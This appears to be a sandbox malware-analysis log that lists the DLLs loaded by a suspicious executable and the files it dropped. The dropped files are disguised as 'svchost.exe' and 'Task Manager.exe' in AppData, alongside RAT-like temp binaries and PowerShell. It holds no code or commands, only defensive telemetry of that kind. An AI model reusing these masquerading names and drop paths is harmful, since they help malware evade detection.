Source: C:\Users\user\Desktop\dLRcE11Dkl.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.cmd Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.cmd Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.cmd Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.cmd Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.cmd Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.cmd Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.cmd Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.cmd Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.cmd Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.cmd Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.cmd Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.cmd Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.cmd Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.cmd Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.cmd Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.cmd Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.cmd Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.cmd Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.cmd Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.cmd Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.cmd Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.cmd Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.cmd Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.cmd Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.cmd Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.cmd Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.cmd Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.cmd Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.cmd Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.cmd Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exe Section loaded: d3dcompiler_43.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exe Section loaded: d3dx11_43.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exe Section loaded: vcruntime140_1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exe Section loaded: vcruntime140_1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
